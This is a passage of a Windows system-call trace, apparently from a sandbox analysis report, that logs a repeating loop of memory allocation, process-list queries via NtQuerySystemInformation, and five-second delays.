BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 